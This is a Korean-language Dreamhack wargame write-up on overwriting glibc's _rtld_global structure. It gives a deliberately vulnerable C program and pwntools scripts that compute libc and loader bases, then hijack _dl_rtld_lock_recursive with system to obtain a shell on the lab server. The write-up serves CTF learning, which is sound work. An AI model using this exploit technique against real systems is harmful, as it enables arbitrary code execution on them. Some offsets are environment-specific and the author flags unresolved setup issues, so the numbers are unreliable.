Overwrite _rtld_global

---

Overwrite _rtld_global

프로그램에서 리턴 명령어를 수행하면 lib와 로더에서 다양한 함수 호출!

// Name: ow_rtld.c
// Compile: gcc -o ow_rtld ow_rtld.c
#include <stdio.h>
#include <stdlib.h>
 
void init() {
  setvbuf(stdin, 0, 2, 0);
  setvbuf(stdout, 0, 2, 0);
}
 
int main() {
  long addr;
  long data;
  int idx;
 
  init();
 
  printf("stdout: %p\n", stdout);
  while (1) {
    printf("> ");
    scanf("%d", &idx);
 
    switch (idx) {
      case 1:
        printf("addr: ");
        scanf("%ld", &addr);
        printf("data: ");
        scanf("%ld", &data);
        *(long long *)addr = data;
        break;
 
      default:
          return 0;
    }
  }
  return 0;
}

모든 보호기법이 적용된 모습 아무래도 로더를 우회하여 실행해봐야겠네요

---

exploit 설계

 lib 및 loder base addr 계산

예제에서 제공한 stdout 주소를 통해 lib_base를 구하고 "/lib64/ld-linux-x86-64.so.2"가
맵핑된 로더의 베이스 주소를 알아봅시다.

라이브러리와 로더가 맵핑된 주소의 간격은 일정하기 때문에 디버깅을 통해
간격을 알아내고 오프셋을 계산해 알아봅시다.

_rtld_global 구조체 계산

로더의 베이스 주소를 알아냈다면, rtld_global 구조체의 심볼 주소를 더해 해당 구조체의 주소를 알아내고,
맴버 변수인 _dl_load_lock과 _dl_rtld_lock_recursive함수 포인터의 주소를 구합니다.

_rtld_global 구조체 조작

프로그램을 종료하는 과정에서 _rtld_global 구조체의 _dl_rtld_lock_recursive함수포인터를 호출
따라서 dl_load_lock에 "/bin/sh"또는 "sh" 문자열을 삽입하고,
dl_rtld_lock_recursive를 system 함수로 덮어쓰면 셸을 획득할 수 있습니다.

---

Exploit code

1. libc, loader_base 계산

예제에서 주어진 stdout 라이브 주소를 이용해 쉽게 lib_base 주소는 이전에 했던것처럼 쉽게 IO_2_1_stdout
심볼 주소를 빼 쉽게 알아내며, 로더의 주소는 디버깅을 통해 lib_base와 빼 결과를 구하면.. 쉽게 구합니다.

하.. 여기선 libc의 주소는 어떻게 따로 구해서 넣어야겠네요(쌍!)

환경 문제 땜에 하.. 실제론 0x3f1000

마스터 카나리는 main 함수가 호출전에 랜덤의 카나리를 쓰레드마다 전역 변수로 사용되는
TLS에 저장 이는 모든 쓰레드가 하나의 카나리 값을 사용하기 위해서이다.

# Name: ow_rtld.py
from pwn import *
 
p = process("./ow_rtld")
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
ld = ELF('/lib64/ld-linux-x86-64.so.2')
 
p.recvuntil(": ")
stdout = int(p.recvuntil("\n"),16)
 
libc_base = stdout - libc.symbols['_IO_2_1_stdout_']
ld_base = libc_base + 0x3f1000
 
print(hex(libc_base))
print(hex(ld_base))
 
p.interactive()

result

---

_rtld_global 주소 계산

lib_base와 loader_base 주소를 알았다면 _rtld_global 구조체와 덮어쓸 멤버 변수의 주소를 구해봅시다.
이 또한 디버깅을 통해 알아낼 수 있습니다.

각 오프셋인 2568..(2312)와 recurisive인(3840)

Dreamhack에서 요청하는 함수인 rtld_lock_recursive가 없는데 환경 문제같아서
추후 구축 후 추가적으로 수정하겠습니다.

# Name: ow_rtld.py
from pwn import *
 
p = process("./ow_rtld")
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
ld = ELF('/lib64/ld-linux-x86-64.so.2')
 
p.recvuntil(": ")
stdout = int(p.recvuntil("\n"),16)
 
libc_base = stdout - libc.symbols['_IO_2_1_stdout_']
ld_base = libc_base + 0x3f1000
 
rtld_global = ld_base + ld.symbols['_rtld_global']
dl_load_lock = rtld_global + 2312
dl_rtld_lock_recursive = rtld_global + 3840
 
p.interactive()

---

_rtld_global 구조체 조작

덮어쓸 주소를 모두 알았다면 _dl_rtld_lock_recursive를 lib 함수 system으로 덮어쓰고,
dl_load_lock 주소에 'sh' 또는 '/bin/sh' 문자열을 쓰면 셸을 획득할 수 있습니다.

GitHub - Ex-Origin/ctf-writeups

여기서 파일 다운받고 ld를 ld = ELF('./ld-2.27.so')로 바꾸고 하면...

from pwn import *
 
p = remote("host3.dreamhack.games", 18969)
libc = ELF('./libc-2.27.so_18.04.3', checksec=False)
ld = ELF('./ld-2.27.so')
 
p.recvuntil(": ")
 
stdout = int(p.recvuntil("\n"),16)
libc_base = stdout - libc.symbols['_IO_2_1_stdout_']
ld_base = libc_base + 0x3f1000
 
 
rtld_global = ld_base + ld.symbols['_rtld_global']
dl_load_lock = rtld_global + 2312
dl_rtld_lock_recursive = rtld_global + 3840
 
system = libc_base + libc.symbols['system']
 
p.sendlineafter("> ", "1")
p.sendlineafter("addr: ", str(dl_load_lock))
p.sendlineafter("data: ", str(u64("/bin/sh\x00")))
 
p.sendlineafter("> ", "1")
p.sendlineafter("addr: ", str(dl_rtld_lock_recursive))
p.sendlineafter("data: ", str(system))
 
p.sendlineafter("> ", "2")
p.interactive()
 

---

참고 자료

 

참고 이미지